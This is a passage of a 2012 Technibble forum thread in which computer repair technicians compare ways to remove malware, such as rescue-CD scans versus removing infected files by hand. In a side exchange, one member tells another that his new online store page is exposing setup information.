Go Back   Technibble Forums > Technical Discussions > Security, Viruses and Trojans

  Technibble Sponsor

Reply
 
Thread Tools Display Modes
  #11  
Old 07-10-2012, 01:38 PM
Galdorf Galdorf is offline
 
Join Date: Feb 2009
Location: Ontario, Canada
Posts: 1,716
Galdorf will become famous soon enough
Default

System restore is never a good idea due to possibility that the restore point could have infected files and chance that a rootkit/bootkit would just re-infect the machine.
Best to start with external scan via rescue cd- kaspersky or slave into test bench and scan.
That way you get to detect and remove rootkit/bootkit/virus/trojans and worms.
Reply With Quote
  #12  
Old 07-10-2012, 01:43 PM
MobileTechie's Avatar
MobileTechie MobileTechie is online now
 
Join Date: Oct 2009
Location: UK
Posts: 4,350
MobileTechie has a spectacular aura aboutMobileTechie has a spectacular aura about
Default

I think it's often a great first step. You can scan for rootkits etc later. Quite often it works wonders and gains you full online control of the machine.
Reply With Quote
  #13  
Old 07-10-2012, 03:59 PM
npinc npinc is offline
 
Join Date: Jun 2012
Posts: 170
npinc can only hope to improve
Default

Quote:
Originally Posted by Galdorf View Post
System restore is never a good idea due to possibility that the restore point could have infected files and chance that a rootkit/bootkit would just re-infect the machine.
Best to start with external scan via rescue cd- kaspersky or slave into test bench and scan.
That way you get to detect and remove rootkit/bootkit/virus/trojans and worms.
That works well with many infections, but not all. We just found that accessing the drive remotely and manually pulling infections out of key folders accelerates the process for us (and we don't even have to meddle in personal folders to do it).

A manual process works well for infections that hide and monitor others, disables key resources, etc. We can do it quickly because we know exactly what we're after and where to find them. That's probably a good part of what sets us head and shoulders above any competition. We've run into many occasions where the previous tech missed key files. Simply using automated tools is insufficient.

It might not work well for the next person if they don't know exactly what they're targetting though, so individual mileage may vary.
Reply With Quote
  #14  
Old 07-10-2012, 08:26 PM
Encrypted Existence Encrypted Existence is online now
 
Join Date: Aug 2011
Posts: 1,239
Encrypted Existence is on a distinguished road
Default

Quote:
Originally Posted by npinc View Post

It might not work well for the next person if they don't know exactly what they're targetting though, so individual mileage may vary.
How do you know which folders to check for each virus? Or do you check the same (common) ones each time?
Reply With Quote
  #15  
Old 07-11-2012, 01:06 AM
Galdorf Galdorf is offline
 
Join Date: Feb 2009
Location: Ontario, Canada
Posts: 1,716
Galdorf will become famous soon enough
Default

Quote:
Originally Posted by npinc View Post
That works well with many infections, but not all. We just found that accessing the drive remotely and manually pulling infections out of key folders accelerates the process for us (and we don't even have to meddle in personal folders to do it).

A manual process works well for infections that hide and monitor others, disables key resources, etc. We can do it quickly because we know exactly what we're after and where to find them. That's probably a good part of what sets us head and shoulders above any competition. We've run into many occasions where the previous tech missed key files. Simply using automated tools is insufficient.

It might not work well for the next person if they don't know exactly what they're targetting though, so individual mileage may vary.
Problem with that method is if all the exe's ,com and dll's are infected you miss them eg. w32.Virut ect.

I do a external virus scan on a fast test bench followed by manual inspection for unknown rootkits/bootkits or zero day fake av's ,autoruns,scan processes which takes 30 mins at most for whole thing.
Reply With Quote
  #16  
Old 07-11-2012, 06:37 AM
npinc npinc is offline
 
Join Date: Jun 2012
Posts: 170
npinc can only hope to improve
Default

Quote:
Originally Posted by Galdorf View Post
Problem with that method is if all the exe's ,com and dll's are infected you miss them eg. w32.Virut ect.

I do a external virus scan on a fast test bench followed by manual inspection for unknown rootkits/bootkits or zero day fake av's ,autoruns,scan processes which takes 30 mins at most for whole thing.
Actually, I don't. We're VERY familiar with Virut. We know exactly what we're looking for and how to identify its nasty presence in a hurry. Virut can't be removed fully and cleanly by virus removal tools, despite what they themselves claim. It's a nasty bugger of a virus.

Also, it's not a carte blanche process, hand picking is just one of many things we do. We don't disclose our complete process. We just clean up the messes.
Reply With Quote
  #17  
Old 07-11-2012, 09:53 AM
Cadishead Computers's Avatar
Cadishead Computers Cadishead Computers is online now
Administrator
 
Join Date: Mar 2010
Location: Manchester UK
Posts: 4,196
Cadishead Computers is a jewel in the roughCadishead Computers is a jewel in the roughCadishead Computers is a jewel in the rough
Default

@npinc, I have just had a look at your site, very impressive.

However, I'm not sure if your aware of this or not, but clicking on your parts tab, and from here to the online parts catalogue, it appears that zen carts has only just been installed, and there is what looks like setup information displayed throughout the catalogue pages.

Apologies, if you did know about this, but thought I would let you know in any case
__________________
Hope this helps
Be Safe

Nige
Cadishead Computers
Reply With Quote
  #18  
Old 07-11-2012, 04:04 PM
npinc npinc is offline
 
Join Date: Jun 2012
Posts: 170
npinc can only hope to improve
Default

Quote:
Originally Posted by Cadishead Computers View Post
@npinc, I have just had a look at your site, very impressive.

However, I'm not sure if your aware of this or not, but clicking on your parts tab, and from here to the online parts catalogue, it appears that zen carts has only just been installed, and there is what looks like setup information displayed throughout the catalogue pages.

Apologies, if you did know about this, but thought I would let you know in any case
Thanks so much. You're right. I TOTALLY forgot about the link on that page and I really appreciate the reminder! I'm setting up a new online store and only have the base install in place at this time. I changed from the old provider and rerouted the domain.

I should fix that right away. Thanks again.
Reply With Quote
  #19  
Old 07-11-2012, 04:41 PM
Cadishead Computers's Avatar
Cadishead Computers Cadishead Computers is online now
Administrator
 
Join Date: Mar 2010
Location: Manchester UK
Posts: 4,196
Cadishead Computers is a jewel in the roughCadishead Computers is a jewel in the roughCadishead Computers is a jewel in the rough
Default

Not a problem buddy. As I mentioned, I wasn't sure if you were aware of it or not. Didn't want you to think I was putting my nose in where it wasn't wanted etc.

Fresh pair of eyes, always helps
__________________
Hope this helps
Be Safe

Nige
Cadishead Computers
Reply With Quote
  #20  
Old 07-11-2012, 06:06 PM
npinc npinc is offline
 
Join Date: Jun 2012
Posts: 170
npinc can only hope to improve
Default

Quote:
Originally Posted by Cadishead Computers View Post
Not a problem buddy. As I mentioned, I wasn't sure if you were aware of it or not. Didn't want you to think I was putting my nose in where it wasn't wanted etc.

Fresh pair of eyes, always helps
Absolutely. I created a quick temporary index page until I get it up and running. Anything else you find, please let me know. So much appreciated.
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 02:57 PM.


Powered by vBulletin®
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
Technibble.com is based out of MELBOURNE, AUSTRALIA.